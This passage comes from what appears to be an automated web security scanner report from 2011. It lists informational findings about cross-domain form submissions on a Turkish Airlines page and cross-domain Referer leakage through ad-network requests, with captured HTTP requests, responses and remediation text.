Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...
<div class="radius-4px" id="fly-filter-airport-frm" style="margin-top:10px; display:none;">
<form action="http://www4.thy.com/deparr/airport.tk?lang=en" method="post" name="airportForm">
<div class="quick_search-schedule-order">
...[SNIP]...
18.10. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...
18.11. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=schedule HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3532

<form id="formTarife" action="http://www4.thy.com/timetable/validateTimetablePage.tk?lang=en"    method="post">
<div class="title">Timetab
...[SNIP]...
18.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...
<div class="radius-4px" id="fly-filter-fly-frm" style="margin-top:10px; display:none;">
<form action="http://www4.thy.com/deparr/flight.tk?lang=en" method="post" name="flightForm">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
19. Cross-domain Referer leakage  previous  next
There are 249 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

19.1. http://a.collective-media.net/cmadj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:90,
ad_w:728,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>');
(function() {
if(document.getElementById('ba.js')) return;
document.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">
...[SNIP]...
19.2. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 39912
Date: Mon, 03 Oct 2011 00:03:24 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
tOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=http://www.softcoin.com/Sites/Kroger_ECoupons/Page/HomePage/Retailer/City_Market?cid=5256632">
<IMG SRC="http://s0.2mdn.net/1817628/PID_1732405_CBS0014_coupon_300x250.jpg" width="300" height="250" BORDER="0" alt="">
</A>
...[SNIP]...
19.3. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Sep 01 05:06:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3Dhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_ZAP"><img src="http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
19.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 21 16:47:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
74783%26migRandom%3D7648338%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bcrtv%26migUnencodedDest%3Dhttp%3A//www.directv.com/DTVAPP/new_customer/base_packages.jsp%3FCMP%3DBAC|5912738|902003|72099485|44174783"><img src="http://s0.2mdn.net/2590120/DTV-171_best-stackcount_nat_300x250_R2.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099485&advid=2590120&sid=902003&adid='></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=235&migSource=adsrv2&migTrackDataExt=2590120;72099485;246929944;44174783&migRandom=7648338&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...
19.5. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Sep 26 17:08:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
56607%26migRandom%3D1471515%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bcrtv%26migUnencodedDest%3Dhttp%3A//www.directv.com/DTVAPP/new_customer/base_packages.jsp%3FCMP%3DBAC|5912738|902003|72099489|44256607"><img src="http://s0.2mdn.net/2590120/DTV-171_best-stackcount_nat_728x90_R2.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099489&advid=2590120&sid=902003&adid='></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=235&migSource=adsrv2&migTrackDataExt=2590120;72099489;246929846;44256607&migRandom=1471515&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...
19.6. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592%26Segments%3d1,9,889,3090,3199,4300,4303,5796,5909,9520,10495,10506,11148,12670,13933,16594,17659,20052,20299,20311,20993,21150,21265,21649,21682,22041,22251,22308,22422,22551,22552,22607,22609,22612,22652,22783,22972,22974,23041,23043,23055,23123,23137,23138,23153,23212%26Targets%3d8858,11482,8427,8852,28340,30402,30431,31767,31928,32592,33460,33543,34010,8830,34059,34011,34009,33719,34787,33164,34632%26Values%3d25,60,80,92,101,150,152,194,208,215,232,261,264,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=badigyw,bhirWrczqllc? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1266
Date: Mon, 03 Oct 2011 00:14:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3dhttp%3a%2f%2fleisure.travelocity.com/Promotions/0%2C%2CTRAVELOCITY|5850|airfare_main|%2C00.html"><img src="http://s0.2mdn.net/viewad/2784362/B6_FirstBags_160x600.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
19.7. http://ad.doubleclick.net/adi/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Goalcomnew/US/tags.js"></script>
...[SNIP]...
19.8. http://ad.doubleclick.net/adj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/cm.guardian/;net=cm;u=,cm-30313306848_1317599407,,soccer,ax.;;sz=728x90;net=cm;env=ifr;ord1=879803;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;ord=$random$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
